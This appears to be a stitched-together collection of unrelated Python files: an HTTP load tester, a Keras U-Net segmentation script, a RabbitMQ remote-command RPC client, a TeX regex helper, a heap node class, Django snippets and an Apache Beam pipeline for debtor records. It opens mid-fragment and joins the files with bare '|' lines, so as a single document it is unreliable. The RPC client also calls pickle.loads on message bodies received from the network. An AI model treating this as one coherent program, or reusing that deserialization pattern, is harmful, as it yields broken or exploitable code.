print(times_list[i-1])
a = [10, '15:41:24', '21:40:40', '05:27:01', '13:37:33', '07:40:36', '08:03:28', '03:46:47', '20:05:22', '04:04:57', '04:34:40']
test(a)
|
import requests
import json
import sys
import time
import os
import threading
time_request_thread=[]
status_code_thread=[]
threads = []
threadLock = threading.Lock()
class myThread (threading.Thread):
    """Worker thread that fires `callnumber` requests of `type` at `url`
    and prints its total elapsed time when done."""

    def __init__(self, threadID, name, callnumber, type, url):
        threading.Thread.__init__(self)
        self.threadID = threadID
        self.name = name
        self.number = callnumber
        self.type = type
        self.url = url

    def run(self):
        """Time the whole batch of requests issued by startThread()."""
        started = time.time()
        startThread(self.name, self.number, self.type, self.url)
        elapsed = time.time() - started
        print("finished " + self.name + " Time: " + str(elapsed))
def writeData(time, status):
    """Append one request's duration and HTTP status to the shared lists.

    Thread-safe: the module-level lock guards both appends.
    """
    # BUG FIX: use 'with' so the lock is released even if an append raises;
    # the original acquire()/release() pair would deadlock every other
    # thread on an exception between the two calls.
    with threadLock:
        time_request_thread.append(time)
        status_code_thread.append(status)
def startThread(name, number, type, url):
    """Issue `number` sequential requests of `type` ('get' or 'post') at
    `url`, printing and recording each result.

    Any other `type` is silently ignored, matching the original behavior.
    """
    # Deduplicated: the original repeated the identical loop body in both
    # the 'get' and 'post' branches; only the request function differs.
    if type == "get":
        request_fn = getData
    elif type == "post":
        request_fn = postData
    else:
        return
    for i in range(0, number):
        time_request = time.time()
        status = request_fn(url)
        time_ended = time.time() - time_request
        print("thread:" + name + " Request Time:" + str(time_ended) + " status:" + str(status))
        writeData(time_ended, status)
        print("Request number: " + str(i + 1))
def getData(url):
    """GET `url` and return the HTTP status code."""
    response = requests.get(url)
    return response.status_code
def postData(url):
    """POST the contents of ./data.json to `url` as JSON; return the
    HTTP status code."""
    with open('data.json') as handle:
        payload = json.load(handle)
    response = requests.post(url=url, json=payload)
    return response.status_code
def _summarize():
    """Print aggregate timing/status statistics for all recorded requests."""
    total = 0
    for elapsed in time_request_thread:
        total = total + elapsed
    average = total / len(time_request_thread)
    ok_count = 0
    for stat in status_code_thread:
        if stat == 200:
            ok_count = ok_count + 1
    print("Biggest time waited:" + str(max(time_request_thread)))
    print("Smallest time waited:" + str(min(time_request_thread)))
    print("Average Time waited:" + str(average))
    print("200 status code = " + str(ok_count) + " in " + str(len(status_code_thread)))


def _run_sequential(calls, request_fn, url):
    """Run `calls` requests one after another, printing per-request and
    then aggregate statistics."""
    start_time = time.time()
    for i in range(0, calls):
        time_request = time.time()
        status = request_fn(url)
        time_ended = time.time() - time_request
        os.system('cls' if os.name == 'nt' else 'clear')
        print("Request Time:" + str(time_ended) + " status:" + str(status))
        # NOTE(review): the original appends here AND inside writeData, so
        # every duration is recorded twice in sequential mode; preserved to
        # keep the reported statistics identical — confirm if intended.
        time_request_thread.append(time_ended)
        writeData(time_ended, status)
        print("Request number: " + str(i + 1))
    print("All done!")
    print("Final Time:" + str(time.time() - start_time))
    _summarize()


def main(argv):
    """CLI entry: argv = [prog, n_threads, n_calls, 'get'|'post', url].

    n_threads > 1 runs the load concurrently; 0 runs it sequentially.
    The three copy-pasted statistics blocks of the original are now the
    single _summarize() helper; the duplicated get/post sequential loops
    are _run_sequential().
    """
    if int(argv[1]) > 1:
        nthreads = int(argv[1])
        for i in range(0, nthreads):
            worker = myThread(i + 1, "thread-" + str(i), int(argv[2]), argv[3], argv[4])
            worker.start()
            threads.append(worker)
        for worker in threads:
            worker.join()
        os.system('cls' if os.name == 'nt' else 'clear')
        print("All done!")
        _summarize()
    elif int(argv[1]) == 0:
        # NOTE(review): n_threads == 1 falls through to the error branch
        # below, exactly as in the original — looks like an off-by-one in
        # the CLI contract; confirm before changing.
        if argv[3] == "get":
            _run_sequential(int(argv[2]), getData, argv[4])
        elif argv[3] == "post":
            _run_sequential(int(argv[2]), postData, argv[4])
    else:
        print("Can't be lower than 0 or empty")


if __name__ == "__main__":
    main(sys.argv)
|
# -*- coding: utf-8 -*-
"""
******************************************************************************
* @author : Jabed-Akhtar
* @Created on : Mon Mar 14 23:04:05 2022
******************************************************************************
* @file : UNet_keras_imageSegmentation.py
* @brief : using U-Net for Image-Segmentation
******************************************************************************
* :Steps :
* 1. Importing python libraries
* 2. Defining variables
* 3. Reading images from folders as data to be trained
* 4. Building the U-Net model
* i. Contraction path
* ii. Expansive path
* 5. Fitting model to data
* 6. Predictions
* :Description:
* - a source used within this script: https://github.com/bnsreenu/python_for_microscopists
* - a picture/doc for understanding the U-Net architecture: '/cnn_architectures_examples_ws/docs_images/UNet_modifiedArchitecture.jpg'
* - dataset can be found at: https://www.kaggle.com/c/data-science-bowl-2018
* -> used datasets: 'data-science-bowl-2018/stage1_test/' and 'data-science-bowl-2018/stage1_train/'
*
******************************************************************************
"""
#Imports ======================================================================
import os
import random
# Just disables the warning, doesn't take advantage of AVX/FMA to run faster
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
import numpy as np
from tqdm import tqdm # for progress-bar feature
import tensorflow as tf
#import tensorflow.keras
from skimage.io import imread, imshow
from skimage.transform import resize
import matplotlib.pyplot as plt
#Variables ====================================================================
TRAIN_PATH = 'datasets/data-science-bowl-2018/stage1_train/'
TEST_PATH = 'datasets/data-science-bowl-2018/stage1_test/'
IMG_WIDTH = 128
IMG_HEIGHT = 128
IMG_CHANNELS = 3

seed = 42
# BUG FIX: the original did 'np.random.seed = seed', which REPLACES the
# seeding function with the integer 42 instead of seeding the RNG.
np.random.seed(seed)

# each subdirectory name is one sample id
train_ids = next(os.walk(TRAIN_PATH))[1]
test_ids = next(os.walk(TEST_PATH))[1]

# preallocate image/mask arrays, filled by the loading loops below
X_train = np.zeros((len(train_ids), IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS), dtype=np.uint8)
# BUG FIX: np.bool was removed in NumPy 1.24; the builtin bool is the
# supported spelling.
Y_train = np.zeros((len(train_ids), IMG_HEIGHT, IMG_WIDTH, 1), dtype=bool)
X_test = np.zeros((len(test_ids), IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS), dtype=np.uint8)
#Reading images from folders ==================================================
# Resize every training image to 128x128 and merge all per-nucleus masks into
# a single binary mask per image.
print('Resizing training images and masks')
for n, id_ in tqdm(enumerate(train_ids), total=len(train_ids)):
    path = TRAIN_PATH + id_
    img = imread(path + '/images/' + id_ + '.png')[:,:,:IMG_CHANNELS]
    img = resize(img, (IMG_HEIGHT, IMG_WIDTH), mode='constant', preserve_range=True)
    X_train[n] = img #Filling empty X_train with values from img
    # NOTE: np.bool was removed in NumPy 1.24; use the builtin bool.
    mask = np.zeros((IMG_HEIGHT, IMG_WIDTH, 1), dtype=bool)
    for mask_file in next(os.walk(path + '/masks/'))[2]:
        mask_ = imread(path + '/masks/' + mask_file)
        mask_ = np.expand_dims(resize(mask_, (IMG_HEIGHT, IMG_WIDTH), mode='constant',
                                      preserve_range=True), axis=-1)
        # Union of all individual nucleus masks.
        mask = np.maximum(mask, mask_)
    Y_train[n] = mask
print('Resizing testing images and masks')
sizes_test = []  # original sizes, kept so predictions can be upscaled later
for n, id_ in tqdm(enumerate(test_ids), total=len(test_ids)):
    path = TEST_PATH + id_
    img = imread(path + '/images/' + id_ + '.png')[:,:,:IMG_CHANNELS]
    sizes_test.append([img.shape[0], img.shape[1]])
    img = resize(img, (IMG_HEIGHT, IMG_WIDTH), mode='constant', preserve_range=True)
    X_test[n] = img
print('Done!')
# Sanity check on one random training sample.
# BUG FIX: random.randint is inclusive at BOTH ends, so len(train_ids) could
# index one past the end of X_train; use len(train_ids) - 1.
image_x = random.randint(0, len(train_ids) - 1)
imshow(X_train[image_x])
plt.show()
# BUG FIX: Y_train[image_x] has shape (H, W, 1); matplotlib's imshow rejects a
# trailing singleton channel, so squeeze it (as the commented variant did).
plt.imshow(np.squeeze(Y_train[image_x]))
plt.show()
#Building the model ===========================================================
# Standard U-Net: a 5-level contracting encoder (16 -> 256 filters), then a
# symmetric expanding decoder whose levels are concatenated with the matching
# encoder outputs (skip connections), ending in a 1-channel sigmoid mask.
inputs = tf.keras.layers.Input((IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS))
#Contraction path *****
# Normalize uint8 pixels to [0, 1] inside the graph.
s = tf.keras.layers.Lambda(lambda x: x / 255)(inputs)
c1 = tf.keras.layers.Conv2D(16, (3,3), activation='relu', kernel_initializer='he_normal', padding='same')(s)
c1 = tf.keras.layers.Dropout(0.1)(c1)
c1 = tf.keras.layers.Conv2D(16, (3,3), activation='relu', kernel_initializer='he_normal', padding='same')(c1)
p1 = tf.keras.layers.MaxPooling2D((2,2))(c1)
c2 = tf.keras.layers.Conv2D(32, (3,3), activation='relu', kernel_initializer='he_normal', padding='same')(p1)
c2 = tf.keras.layers.Dropout(0.2)(c2)
c2 = tf.keras.layers.Conv2D(32, (3,3), activation='relu', kernel_initializer='he_normal', padding='same')(c2)
p2 = tf.keras.layers.MaxPooling2D((2,2))(c2)
c3 = tf.keras.layers.Conv2D(64, (3,3), activation='relu', kernel_initializer='he_normal', padding='same')(p2)
c3 = tf.keras.layers.Dropout(0.2)(c3)
c3 = tf.keras.layers.Conv2D(64, (3,3), activation='relu', kernel_initializer='he_normal', padding='same')(c3)
p3 = tf.keras.layers.MaxPooling2D((2,2))(c3)
c4 = tf.keras.layers.Conv2D(128, (3,3), activation='relu', kernel_initializer='he_normal', padding='same')(p3)
c4 = tf.keras.layers.Dropout(0.2)(c4)
c4 = tf.keras.layers.Conv2D(128, (3,3), activation='relu', kernel_initializer='he_normal', padding='same')(c4)
p4 = tf.keras.layers.MaxPooling2D((2,2))(c4)
# Bottleneck (8x8 spatial resolution at 128x128 input).
c5 = tf.keras.layers.Conv2D(256, (3,3), activation='relu', kernel_initializer='he_normal', padding='same')(p4)
c5 = tf.keras.layers.Dropout(0.3)(c5)
c5 = tf.keras.layers.Conv2D(256, (3,3), activation='relu', kernel_initializer='he_normal', padding='same')(c5)
#Expansive path *****
# Each level: 2x transposed-conv upsample, concat with the encoder skip, conv.
u6 = tf.keras.layers.Conv2DTranspose(128, (2,2), strides=(2,2), padding='same')(c5)
u6 = tf.keras.layers.concatenate([u6, c4])
c6 = tf.keras.layers.Conv2D(128, (3,3), activation='relu', kernel_initializer='he_normal', padding='same')(u6)
c6 = tf.keras.layers.Dropout(0.2)(c6)
c6 = tf.keras.layers.Conv2D(128, (3,3), activation='relu', kernel_initializer='he_normal', padding='same')(c6)
u7 = tf.keras.layers.Conv2DTranspose(64, (2,2), strides=(2,2), padding='same')(c6)
u7 = tf.keras.layers.concatenate([u7, c3])
c7 = tf.keras.layers.Conv2D(64, (3,3), activation='relu', kernel_initializer='he_normal', padding='same')(u7)
c7 = tf.keras.layers.Dropout(0.2)(c7)
c7 = tf.keras.layers.Conv2D(64, (3,3), activation='relu', kernel_initializer='he_normal', padding='same')(c7)
u8 = tf.keras.layers.Conv2DTranspose(32, (2,2), strides=(2,2), padding='same')(c7)
u8 = tf.keras.layers.concatenate([u8, c2])
c8 = tf.keras.layers.Conv2D(32, (3,3), activation='relu', kernel_initializer='he_normal', padding='same')(u8)
c8 = tf.keras.layers.Dropout(0.2)(c8)
c8 = tf.keras.layers.Conv2D(32, (3,3), activation='relu', kernel_initializer='he_normal', padding='same')(c8)
u9 = tf.keras.layers.Conv2DTranspose(16, (2,2), strides=(2,2), padding='same')(c8)
u9 = tf.keras.layers.concatenate([u9, c1], axis=3)
c9 = tf.keras.layers.Conv2D(16, (3,3), activation='relu', kernel_initializer='he_normal', padding='same')(u9)
c9 = tf.keras.layers.Dropout(0.1)(c9)
c9 = tf.keras.layers.Conv2D(16, (3,3), activation='relu', kernel_initializer='he_normal', padding='same')(c9)
# 1x1 conv + sigmoid -> per-pixel foreground probability.
outputs = tf.keras.layers.Conv2D(1, (1,1), activation='sigmoid')(c9)
model = tf.keras.Model(inputs=[inputs], outputs=[outputs])
model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])
model.summary()
#Fitting model to data ========================================================
#Model checkpointer: persists the best model (by val_loss) to disk.
checkpointer = tf.keras.callbacks.ModelCheckpoint('UNet_model_for_nuclei.h5', verbose=1, save_best_only=True)
callbacks = [
    checkpointer,  # BUG FIX: the checkpointer was created but never passed to fit(), so no model was ever saved
    tf.keras.callbacks.EarlyStopping(patience=2, monitor='val_loss'),
    tf.keras.callbacks.TensorBoard(log_dir='logs')]
results = model.fit(X_train, Y_train, validation_split=0.1, batch_size=16, epochs=25, callbacks=callbacks)
#Testings/Predictions =========================================================
# The first 90% of X_train was used for training (validation_split=0.1 above);
# predict separately on the train part, the validation part, and the test set.
# (Removed unused `idx = random.randint(...)` from the original.)
preds_train = model.predict(X_train[:int(X_train.shape[0]*0.9)], verbose=1)
preds_val = model.predict(X_train[int(X_train.shape[0]*0.9):], verbose=1)
preds_test = model.predict(X_test, verbose=1)
# Binarize the sigmoid outputs at 0.5.
preds_train_t = (preds_train > 0.5).astype(np.uint8)
preds_val_t = (preds_val > 0.5).astype(np.uint8)
preds_test_t = (preds_test > 0.5).astype(np.uint8)
#Perform a sanity check on some random training samples
# BUG FIX: random.randint's upper bound is inclusive; subtract 1 to avoid an
# occasional IndexError on the last index + 1.
ix = random.randint(0, len(preds_train_t) - 1)
imshow(X_train[ix])
plt.show()
plt.imshow(np.squeeze(Y_train[ix]))
plt.show()
#Perform a sanity check on some random validation samples
ix = random.randint(0, len(preds_val_t) - 1)
imshow(X_train[int(X_train.shape[0]*0.9):][ix])
plt.show()
plt.imshow(np.squeeze(Y_train[int(Y_train.shape[0]*0.9):][ix]))
plt.show()
plt.imshow(np.squeeze(preds_val_t[ix]))
plt.show()
# ****************************** END OF FILE **********************************
#!/usr/bin/env python
# _*_ encoding:utf-8 _*_
__author__='han'
import os,sys
import configparser,pika,random,threading,pickle,time
# Project root (two directories above this file); prepended to sys.path so
# that the 'conf' package resolves regardless of the working directory.
path = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0,path)
class Rpc_Clinet(object):
    '''
    RPC client: reads RabbitMQ settings from conf/config.ini, publishes
    shell commands to remote hosts via a direct exchange, and collects each
    host's reply under a short numeric task id.
    (The original "Clinet" spelling is kept so existing imports still work.)
    '''
    def __init__(self):
        # task_id -> {host: result}; '' marks a reply not yet received
        self.Rpc_dict = {}
        self.Get_Conf()
    def Get_Conf(self):
        '''
        Load RabbitMQ connection settings from conf/config.ini.
        :return:
        '''
        config = configparser.ConfigParser()
        config.read(os.path.join(path,'conf','config.ini'))
        self.Host = config['RabbitMQ']['host']
        self.Port = int(config['RabbitMQ']['port'])
        self.Time_Out = int(config['RabbitMQ']['timeout'])
        self.Credentials = pika.PlainCredentials(config['RabbitMQ']['user'],config['RabbitMQ']['pwd'])
    def Handler(self):
        '''
        Open the RabbitMQ connection and channel.
        :return:
        '''
        self.Conn = pika.BlockingConnection(
            pika.ConnectionParameters(
                host=self.Host,
                port=self.Port,
                credentials=self.Credentials
            )
        )
        self.Channel = self.Conn.channel()
    def Command(self):
        '''
        Interactive loop: `run "cmd" --host h1 h2`, `check_task id`, `quit`.
        :return:
        '''
        while True:
            choice = input('\033[35m>>:\033[0m').strip()
            choice_list = choice.split('"')
            if choice.startswith('run'):
                if len(choice_list) == 3:
                    cmd = choice_list[1]
                    host_str = choice_list[2].strip()
                    if '--host' not in host_str:
                        print('cmd Error!')
                    else:
                        host_group = host_str.split(' ')
                        host_list = []
                        task_id = self.Create_Id()
                        # host_group[0] is the '--host' flag itself; skip it
                        for i in range(1,len(host_group)):
                            host_list.append(host_group[i])
                        # Dispatch in a thread so the prompt stays responsive
                        thread = threading.Thread(
                            target=self.Run,
                            args=(task_id,cmd,host_list)
                        )
                        thread.start()
                    continue
                else:
                    print('\033[31mCommand Error!\033[0m')
                    self.Help()
                    continue
            elif choice.startswith('check_task'):
                choice_list = choice.split()
                if len(choice_list) ==2:
                    task_id = choice_list[1]
                    self.Result(task_id)
                else:
                    print('\033[1;31;1mCommand Error!\033[0m')
                    self.Help()
                    continue
            elif choice == 'quit':
                break
            else:
                print('\033[1;31;1mCommand Error!\033[0m')
                self.Help()
    def Help(self):
        '''
        Print usage help.
        :return:
        '''
        print('\033[1;36;1mrun shell: run "command" [--host hostname]')
        print('you must add " at command start and end or it will be error')
        print('get result: check_task task_id')
        print('input quit to exit\033[0m')
    def Run(self,task_id,cmd,host_list):
        '''
        Declare the per-task reply queue and its consumer,
        then send the command to every host.
        :return:
        '''
        self.Handler()
        self.Channel.queue_declare(queue=task_id)
        # NOTE(review): callback-first basic_consume is the pika < 1.0
        # signature; confirm the pinned pika version before upgrading.
        self.Channel.basic_consume(
            self.Response,
            queue=task_id
        )
        self.Send_Cmd(task_id,cmd,host_list)
    def Send_Cmd(self,task_id,cmd,host_list):
        '''
        Publish the command to each host and poll for replies until every
        host answered or the configured timeout (seconds) expired.
        :return:
        '''
        for host in host_list:
            self.Rpc_dict[task_id][host] = ''
        data = {'cmd':cmd}
        self.Channel.exchange_declare(
            exchange='rpc',
            exchange_type='direct'
        )
        for host in host_list:
            self.Channel.basic_publish(
                exchange='rpc',
                routing_key=host,
                properties=pika.BasicProperties(
                    reply_to=task_id,
                ),
                body=pickle.dumps(data)
            )
        for host in host_list:
            count = 0
            while self.Rpc_dict[task_id][host] == '':
                self.Conn.process_data_events()
                time.sleep(0.1)
                count += 1
                if count > self.Time_Out*10:
                    print('host[%s] connection timeout'%host)
                    break
    def Response(self,ch,method,props,body):
        '''
        Consumer callback: store a host's reply and acknowledge the message.
        :return:
        '''
        task_id = props.message_id
        res = pickle.loads(body)['res']
        host = props.correlation_id
        self.Rpc_dict[task_id][host] = res
        # acknowledge receipt
        self.Channel.basic_ack(delivery_tag=method.delivery_tag)
    def Create_Id(self):
        '''Create a unique 5-digit task id, register it in Rpc_dict, return it.'''
        task_id = ''
        for i in range(5):
            current = random.randrange(0,9)
            task_id += str(current)
        if task_id in self.Rpc_dict:
            # BUG FIX: the original called self.Create_Id() recursively but
            # ignored its result and returned the COLLIDING id, so two tasks
            # could share one entry.  Propagate the freshly generated id.
            return self.Create_Id()
        else:
            self.Rpc_dict[task_id] = {}
            print('task_id:',task_id)
            return task_id
    def Result(self,id):
        '''
        Print every host's stored result for the task,
        then drop the task from the results dictionary.
        :return:
        '''
        for host in self.Rpc_dict[id]:
            print(('host %s')%host.center(50,'-'))
            print(self.Rpc_dict[id][host])
        del self.Rpc_dict[id]
|
import re
# TeX control words consist of letters only.  The old pattern used \w, which
# also matched digits and '_' (the "XXX: need to exclude '_'" note); match
# an explicit letter class instead.
command_pattern = r'(\\[a-zA-Z]+)'
command_regex = re.compile(command_pattern)
def find_all_commands(filename):
    """ Finds all TeX commands used in the file; returns them as a set. """
    # BUG FIX: the original iterated over open(filename) without ever closing
    # it (handle leak); a context manager releases it deterministically.
    commands = set()
    with open(filename) as src:
        for line in src:
            commands.update(command_regex.findall(line))
    return commands
def find_all_commands_in_string(s):
    """Return every TeX-command occurrence in *s*, in order, duplicates kept."""
    return [match.group(1) for match in command_regex.finditer(s)]
|
#!/usr/bin/python3
"""Base object for construction of all heap variants"""
class Node:
    """Generic heap node: carries every pointer any heap variant may need."""

    def __init__(self, key):
        """Initialise all fields; each concrete heap uses only its subset."""
        self.key = key
        # structural links — None until the node is wired into a heap
        self.parent = None
        self.leftChild = None
        self.rightChild = None
        self.nextSibling = None
        self.prevSibling = None
        # shape flags for variants that track one-sided children
        self.leftOnly = False
        self.rightOnly = False
        # smallest key in this node's subtree (large sentinel acts as +inf)
        self.min = 1000000000
        # back-reference used when testing with Dijkstra's algorithm
        self.vertex = None
|
from django.core.management.base import BaseCommand, CommandError
import _listen_for_tweets
class Command(BaseCommand):
    """Django management command that starts the tweet-listener loop."""
    def handle(self, *args, **options):
        # Delegate to the module-level entry point; blocks until it returns.
        _listen_for_tweets.main()
|
from django.contrib import admin
from .models import ImgUpload
@admin.register(ImgUpload)
class ImgUploadAdmin(admin.ModelAdmin):
    """Admin configuration for uploaded images."""
    # Columns shown on the changelist page.
    list_display = (
        'imgupload_category',
        'imgupload_file',
        'imgupload_tags',
        'imgupload_uploader',
        'imgupload_upload_dttm'
    )
    # Every displayed column links to the change form.
    list_display_links = list_display
    # Uploader and upload timestamp are set by the app, not editable by hand.
    readonly_fields = (
        'imgupload_uploader',
        'imgupload_upload_dttm'
    )
|
#coding: utf-8
from __future__ import print_function, absolute_import
import logging
import re
import json
import requests
import uuid
import time
import os
import argparse
import uuid
import datetime
import socket
import apache_beam as beam
from apache_beam.io import ReadFromText
from apache_beam.io import WriteToText
from apache_beam.io.filesystems import FileSystems
from apache_beam.metrics import Metrics
from apache_beam.metrics.metric import MetricsFilter
from apache_beam import pvalue
from apache_beam.options.pipeline_options import PipelineOptions
from apache_beam.options.pipeline_options import SetupOptions
# BigQuery schema for the target table: comma-separated "name:TYPE" pairs.
# Every column is loaded as STRING; parsing/typing happens downstream.
TABLE_SCHEMA = (
    'idkey:STRING, '
    'fecha:STRING, '
    'ZONA:STRING, '
    'CODIGO_DE_CIUDAD:STRING, '
    'CEDULA_CIUDADANIA:STRING, '
    'CODIGO_INTERNO:STRING, '
    'TIPO_COMPRADORA:STRING, '
    'CUSTOMER_CLASS:STRING, '
    'CUPO:STRING, '
    'NUMERO_DE_OBLIGACION:STRING, '
    'VALOR_FACTURA:STRING, '
    'FECHA_FACTURA:STRING, '
    'FECHA_VENCIMIENTO:STRING, '
    'VALOR_SALDO_EN_CARTERA:STRING, '
    'DIAS_DE_VENCIMIENTO:STRING, '
    'CAMPANA_ORIGINAL:STRING, '
    'ULTIMA_CAMPANA:STRING, '
    'CODIGO:STRING, '
    'NOMBRE:STRING, '
    'APELLIDOS:STRING, '
    'TELEFONO_1:STRING, '
    'CELULAR:STRING, '
    'TEL_CEL_2:STRING, '
    'E_MAIL:STRING, '
    'AUTORIZO_ENVIO_DE_MENSAJES_DE_TEXTO_A_MI_CELULAR_SI_NO:STRING, '
    'AUTORIZO_CORREOS_DE_VOZ_A_MI_CELULAR_SI_NO:STRING, '
    'AUTORIZO_ENVIO_DE_E_MAIL_SI_NO:STRING, '
    'DIRECCION:STRING, '
    'BARRIO:STRING, '
    'CIUDAD:STRING, '
    'DEPARTAMENTO:STRING, '
    'DIRECCION_1:STRING, '
    'BARRIO_1:STRING, '
    'CIUDAD_1:STRING, '
    'DEPARTAMENTO_1:STRING, '
    'NOMBRE_REF1:STRING, '
    'APELLIDO_1:STRING, '
    'PARENTESCO_1:STRING, '
    'CELULAR_1:STRING, '
    'NOMBRE_REF2:STRING, '
    'APELLIDO_2:STRING, '
    'PARENTESCO_2:STRING, '
    'TELEFONO_2:STRING, '
    'CELULAR_2:STRING, '
    'DIRECCION_2:STRING, '
    'CIUDAD_2:STRING, '
    'DEPARTAMENTO_2:STRING, '
    'NOMBRE_REF3:STRING, '
    'APELLIDO_3:STRING, '
    'TELEFONO_3:STRING, '
    'CELULAR_3:STRING, '
    'DIRECCION_3:STRING, '
    'CIUDAD_3:STRING, '
    'DEPARTAMENTO_3:STRING, '
    'NOMBRE_REF4:STRING, '
    'APELLIDO_4:STRING, '
    'DIRECCION_4:STRING, '
    'TELEFONO_4:STRING, '
    'CELULAR_4:STRING, '
    'CIUDAD_4:STRING, '
    'DEPARTAMENTO_4:STRING, '
    'ABOGAD:STRING, '
    'DIVSION:STRING, '
    'PAIS:STRING, '
    'FECHA_DE_PROXIMA_CONFERENCIA:STRING '
)
# Beam DoFn that turns one semicolon-separated CSV line into a BigQuery row.
class formatearData(beam.DoFn):
    """Map a raw CSV line to a dict matching TABLE_SCHEMA, adding a random
    idkey and the load date supplied at construction time."""
    def __init__(self, mifecha):
        super(formatearData, self).__init__()
        # Load date stamped into every row's 'fecha' column.
        self.mifecha = mifecha
    def process(self, element):
        """Split *element* on ';' and emit a one-element list with the row dict.

        NOTE(review): assumes each line has at least 63 fields — a shorter
        line raises IndexError; confirm upstream files are well-formed.
        """
        # print(element)
        arrayCSV = element.split(';')
        tupla= {'idkey' : str(uuid.uuid4()),
        # 'fecha' : datetime.datetime.today().strftime('%Y-%m-%d'),
        'fecha': self.mifecha,
        'ZONA' : arrayCSV[0],
        'CODIGO_DE_CIUDAD' : arrayCSV[1],
        'CEDULA_CIUDADANIA' : arrayCSV[2],
        'CODIGO_INTERNO' : arrayCSV[3],
        'TIPO_COMPRADORA' : arrayCSV[4],
        'CUSTOMER_CLASS' : arrayCSV[5],
        'CUPO' : arrayCSV[6],
        'NUMERO_DE_OBLIGACION' : arrayCSV[7],
        'VALOR_FACTURA' : arrayCSV[8],
        'FECHA_FACTURA' : arrayCSV[9],
        'FECHA_VENCIMIENTO' : arrayCSV[10],
        'VALOR_SALDO_EN_CARTERA' : arrayCSV[11],
        'DIAS_DE_VENCIMIENTO' : arrayCSV[12],
        'CAMPANA_ORIGINAL' : arrayCSV[13],
        'ULTIMA_CAMPANA' : arrayCSV[14],
        'CODIGO' : arrayCSV[15],
        'NOMBRE' : arrayCSV[16],
        'APELLIDOS' : arrayCSV[17],
        'TELEFONO_1' : arrayCSV[18],
        'CELULAR' : arrayCSV[19],
        'TEL_CEL_2' : arrayCSV[20],
        'E_MAIL' : arrayCSV[21],
        'AUTORIZO_ENVIO_DE_MENSAJES_DE_TEXTO_A_MI_CELULAR_SI_NO' : arrayCSV[22],
        'AUTORIZO_CORREOS_DE_VOZ_A_MI_CELULAR_SI_NO' : arrayCSV[23],
        'AUTORIZO_ENVIO_DE_E_MAIL_SI_NO' : arrayCSV[24],
        'DIRECCION' : arrayCSV[25],
        'BARRIO' : arrayCSV[26],
        'CIUDAD' : arrayCSV[27],
        'DEPARTAMENTO' : arrayCSV[28],
        'DIRECCION_1' : arrayCSV[29],
        'BARRIO_1' : arrayCSV[30],
        'CIUDAD_1' : arrayCSV[31],
        'DEPARTAMENTO_1' : arrayCSV[32],
        'NOMBRE_REF1' : arrayCSV[33],
        'APELLIDO_1' : arrayCSV[34],
        'PARENTESCO_1' : arrayCSV[35],
        'CELULAR_1' : arrayCSV[36],
        'NOMBRE_REF2' : arrayCSV[37],
        'APELLIDO_2' : arrayCSV[38],
        'PARENTESCO_2' : arrayCSV[39],
        'TELEFONO_2' : arrayCSV[40],
        'CELULAR_2' : arrayCSV[41],
        'DIRECCION_2' : arrayCSV[42],
        'CIUDAD_2' : arrayCSV[43],
        'DEPARTAMENTO_2' : arrayCSV[44],
        'NOMBRE_REF3' : arrayCSV[45],
        'APELLIDO_3' : arrayCSV[46],
        'TELEFONO_3' : arrayCSV[47],
        'CELULAR_3' : arrayCSV[48],
        'DIRECCION_3' : arrayCSV[49],
        'CIUDAD_3' : arrayCSV[50],
        'DEPARTAMENTO_3' : arrayCSV[51],
        'NOMBRE_REF4' : arrayCSV[52],
        'APELLIDO_4' : arrayCSV[53],
        'DIRECCION_4' : arrayCSV[54],
        'TELEFONO_4' : arrayCSV[55],
        'CELULAR_4' : arrayCSV[56],
        'CIUDAD_4' : arrayCSV[57],
        'DEPARTAMENTO_4' : arrayCSV[58],
        'ABOGAD' : arrayCSV[59],
        'DIVSION' : arrayCSV[60],
        'PAIS' : arrayCSV[61],
        'FECHA_DE_PROXIMA_CONFERENCIA' : arrayCSV[62]
        }
        return [tupla]
def run(archivo, mifecha):
    """Build and run the Beam pipeline: read the semicolon-separated file
    *archivo*, stamp every row with *mifecha* via formatearData, and append
    the rows to BigQuery table unificadas.prejuridico.

    Returns a fixed status string on completion.
    """
    gcs_path = "gs://ct-unificadas" # root of the GCS bucket used for staging/temp
    gcs_project = "contento-bi"
    # Use DataflowRunner only on the production host; DirectRunner elsewhere.
    mi_runer = ("DirectRunner", "DataflowRunner")[socket.gethostname()=="contentobi"]
    pipeline = beam.Pipeline(runner=mi_runer, argv=[
        "--project", gcs_project,
        "--staging_location", ("%s/dataflow_files/staging_location" % gcs_path),
        "--temp_location", ("%s/dataflow_files/temp" % gcs_path),
        "--output", ("%s/dataflow_files/output" % gcs_path),
        "--setup_file", "./setup.py",
        "--max_num_workers", "10",
        "--subnetwork", "https://www.googleapis.com/compute/v1/projects/contento-bi/regions/us-central1/subnetworks/contento-subnet1"
        # "--num_workers", "30",
        # "--autoscaling_algorithm", "NONE"
        ])
    # lines = pipeline | 'Lectura de Archivo' >> ReadFromText("gs://ct-bancolombia/info-segumiento/BANCOLOMBIA_INF_SEG_20181206 1100.csv", skip_header_lines=1)
    #lines = pipeline | 'Lectura de Archivo' >> ReadFromText("gs://ct-bancolombia/info-segumiento/BANCOLOMBIA_INF_SEG_20181129 0800.csv", skip_header_lines=1)
    lines = pipeline | 'Lectura de Archivo' >> ReadFromText(archivo, skip_header_lines=1)
    transformed = (lines | 'Formatear Data' >> beam.ParDo(formatearData(mifecha)))
    # lines | 'Escribir en Archivo' >> WriteToText("archivos/Info_carga_banco_prej_small", file_name_suffix='.csv',shard_name_template='')
    # transformed | 'Escribir en Archivo' >> WriteToText("archivos/Info_carga_banco_seg", file_name_suffix='.csv',shard_name_template='')
    #transformed | 'Escribir en Archivo' >> WriteToText("gs://ct-bancolombia/info-segumiento/info_carga_banco_seg",file_name_suffix='.csv',shard_name_template='')
    # Append rows to BigQuery, creating the table from TABLE_SCHEMA if needed.
    transformed | 'Escritura a BigQuery Leonisa Estrategia' >> beam.io.WriteToBigQuery(
        gcs_project + ":unificadas.prejuridico",
        schema=TABLE_SCHEMA,
        create_disposition=beam.io.BigQueryDisposition.CREATE_IF_NEEDED,
        write_disposition=beam.io.BigQueryDisposition.WRITE_APPEND
        )
    # transformed | 'Borrar Archivo' >> FileSystems.delete('gs://ct-avon/prejuridico/AVON_INF_PREJ_20181111.TXT')
